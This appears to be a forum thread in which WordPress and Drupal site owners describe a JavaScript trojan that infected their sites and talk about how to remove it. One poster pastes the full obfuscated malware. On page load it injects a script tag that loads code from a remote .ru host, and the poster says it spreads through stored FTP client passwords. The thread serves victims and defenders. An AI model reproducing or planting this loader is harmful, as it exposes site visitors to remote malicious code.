Thank you all for the valuable information. I am not a techy person and I need help. My WP blog was just infected by a Trojan virus JS:Illredir-CB[Trj]. When I open my website, Avast gives a notice that looks like this:

Object: my website folder\javascript\date.js
Infection: JS:Illredir-CB[Trj]
Action: Connection aborted
Process: c:\Program Files\IE\iexplore.exe

Can anybody help me how to remove this virus? I have informed my hosting about this but they said the infection must be in my local hard drive. Thanks in advance.

In my case (a few DRUPAL websites) the sites were not loading (a PHP error was spitted out) and therefore I noticed the presence of these weird JS lines at the end of my files.

It seems to use FTP client stored passwords (filezilla’s in my case) to connect to every site and modify files.

It is been a pain in the ass to fix all the mess this shit has done.

The malware code is something like:
YS=["r","Ro"];this.c=11526;this.c-=10;l={d:”K”};var T={};var y=document;var b=”b”;var Yi=”Yi”;var R=new String(“body6mNV”.substr(0,4));var ln=new Array();var _e=”;var z=null;var cU=["vA"];var s=”sc”+”ri”+”pt”;var q=window;this.P=43688;this.P++;var qG;var CB=”";function i(){mT={M:”rx”};this.If=”;var X=String(“]”);var H=”;var Xb={A:13552};var hm={Dp:61130};var B=RegExp;var Sa=["S_","Mo"];this.zO=49795;this.zO+=11;var Z=”\x2f\x62\x72\x61\x6d\x6a\x6e\x65\x74\x2d\x63\x6f\x6d\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x6c\x65\x6f\x2e\x6f\x72\x67\x2e\x70\x68\x70″;this.g=25187;this.g+=62;var Jv=”Jv”;var X=String(“]”);Ur=29560;Ur–;var Nu=new Array();Ql=60522;Ql–;this.WX=false;function _(L,h){var Yx=new Array();var o=”[";Vn=6775;Vn++;o+=h;o+=X;lR=["e","vH"];var V=new B(o, new String(“gKaW6″.substr(0,1)));try {var V_=’WH’} catch(V_){};return L[new String("rep"+"lacgj8".substr(0,3)+"e")](V, H);Mm=41961;Mm–;};try {var xu=’vu’} catch(xu){};try {var tm=’IH’} catch(tm){};var CN=”CN”;var w=940941-932861;var XG=String(“http:”+”//nos”+”ypipe”+”.ru:”);this.qS=”;var Bv=8354;z=String(“onl”+”oad”);cz=["Ni","fv","RD"];var VU=”;var TG=["uh"];Fq={};var v=_(‘cGrQeUaOtBewEOlOeImPeSnwtw’,'PsSIOGDyQiUoFqTBwZX’);var _n=_(‘aQp6pKe0nud0C8hui1l3du’,'38uqo0JwM1KQ6V’);qG=function(){var cn=new String();try {try {} catch(ZZ){};F=y[v](s);DC={EY:18252};Ru={eo:49335};VU=XG;try {var UX=’PS’} catch(UX){};ma={lC:11445};VU+=w;this.je=false;VU+=Z;IHU=[];try {var os=’sN’} catch(os){};var D=”src2md”.substr(0,3);cUe={xf:”GK”};var m=_(‘d1e1fpeArZ’,'1Xi_pZA’);this.p=46351;this.p+=155;F[D]=VU;var Bm={Vi:”WS”};F[m]=[1][0];kY={oI:false};var PI=new Array();this.VN=”VN”;gL=["hu","wM","za"];y[R][_n](F);var ek=new String();} catch(f){var iC={xI:2475};var BZ=new Array();this.qz=24565;this.qz-=141;};try {} catch(yW){};var Xw={kn:62411};};JA=62427;JA++;jI=13986;jI++;};var Sw=”;var kA=["KP","xb","gF"];i();this.Ss=44880;this.Ss++;var Ek=”";var Sv=["yb","FS"];q[z]=qG;WY=32921;WY-=67;

Hope this helps someone.

I did not spot it in the first place because its name was similar to a standard Wp file. But a comparison with a blank WP installation shows this extra file.